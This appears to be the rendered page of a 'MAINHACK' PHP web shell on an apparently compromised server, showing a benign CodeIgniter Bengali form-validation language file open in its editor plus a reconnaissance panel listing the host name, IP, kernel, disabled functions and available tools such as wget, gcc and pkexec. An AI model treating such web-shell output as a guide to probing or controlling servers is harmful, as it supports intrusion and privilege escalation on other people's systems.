[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: form_validation_lang.php
<?php /** * System messages translation for CodeIgniter(tm) * * @author CodeIgniter community * @author Iban Eguia * @copyright Copyright (c) 2014-2019, British Columbia Institute of Technology (https://bcit.ca/) * @license http://opensource.org/licenses/MIT MIT License * @link https://codeigniter.com */ defined('BASEPATH') OR exit('No direct script access allowed'); $lang['form_validation_required'] = '{field} ফিল্ডটি অবশ্যই পূরণ করতে হবে'; $lang['form_validation_isset'] = '{field} ফিল্ডে অবশ্যই ভ্যালু থাকতে হবে'; $lang['form_validation_valid_email'] = '{field} ফিল্ডে অবশ্যই সঠিক ইমেইল দিতে হবে'; $lang['form_validation_valid_emails'] = '{field} ফিল্ডে অবশ্যই সব ইমেইল সঠিক হতে হবে'; $lang['form_validation_valid_url'] = '{field} ফিল্ডে অবশ্যই সঠিক ওয়েব এ্যাড্রেস দিতে হবে'; $lang['form_validation_valid_ip'] = '{field} ফিল্ডে অবশ্যই সঠিক আইপি (IP) দিতে হবে'; $lang['form_validation_min_length'] = '{field} ফিল্ডের ভ্যালু অবশ্যই {param} ক্যারেকটারের কম হতে পারবে না'; $lang['form_validation_max_length'] = '{field} ফিল্ডের ভ্যালু অবশ্যই {param} ক্যারেকটারের বেশি হতে পারবে না'; $lang['form_validation_exact_length'] = '{field} ফিল্ডের ভ্যালু অবশ্যই {param} ক্যারেকটারের কম বা বেশি হতে পারবে না'; $lang['form_validation_alpha'] = '{field} ফিল্ডের ভ্যালু অবশ্যই আলফাবেটিক হতে হবে যেমন: abc বা ABC'; $lang['form_validation_alpha_numeric'] = '{field} ফিল্ডের ভ্যালু অবশ্যই আলফা নিউমেরিক হতে হবে যেমন: abc বা ABC বা abc123 বা ABC123'; $lang['form_validation_alpha_numeric_spaces'] = '{field} ফিল্ডের ভ্যালু অবশ্যই আলফা নিউমেরিক হতে হবে যেমন: abc বা ABC বা abc123 বা ABC123 তবে একটি স্পেস থাকতে পারবে'; $lang['form_validation_alpha_dash'] = '{field} ফিল্ডের ভ্যালু অবশ্যই আলফা নিউমেরিক হতে হবে যেমন: abc বা ABC বা abc123 বা ABC12 তবে _ বা - থাকতে পারবে'; $lang['form_validation_numeric'] = '{field} ফিল্ডের ভ্যালু অবশ্যই শুধু নাম্বার হতে হবে যেমন: 12 বা 12.34'; $lang['form_validation_is_numeric'] = '{field} ফিল্ডের ভ্যালু অবশ্যই শুধু নিউমেরিক হতে হবে যেমন: 12 বা 34'; $lang['form_validation_integer'] = '{field} ফিল্ডের ভ্যালু অবশ্যই ইন্টিজার হতে হবে যেমন: 12 বা 34'; $lang['form_validation_regex_match'] = '{field} is not in the correct format.'; $lang['form_validation_matches'] = '{field} ফিল্ডের ভ্যালু অবশ্যই {param} এর মত একই হতে হবে'; $lang['form_validation_differs'] = '{field} field must be different from the {param} field.'; $lang['form_validation_is_unique'] = '{field} ফিল্ডের ভ্যালু অবশ্যই ইউনিক হতে হবে'; $lang['form_validation_is_natural'] = '{field} field can only contain digits.'; $lang['form_validation_is_natural_no_zero'] = '{field} field can only contain digits and must be greater than zero.'; $lang['form_validation_decimal'] = '{field} field must contain a decimal number.'; $lang['form_validation_less_than'] = '{field} field must contain a number less than {param}.'; $lang['form_validation_less_than_equal_to'] = '{field} field must contain a number less than or equal to {param}.'; $lang['form_validation_greater_than'] = '{field} field must contain a number greater than {param}.'; $lang['form_validation_greater_than_equal_to'] = '{field} field must contain a number greater than or equal to {param}.'; $lang['form_validation_error_message_not_set'] = 'corresponding error message for field {field} could not be accessed.'; $lang['form_validation_in_list'] = '{field} field must contain one of these: {param}.';
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 60 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002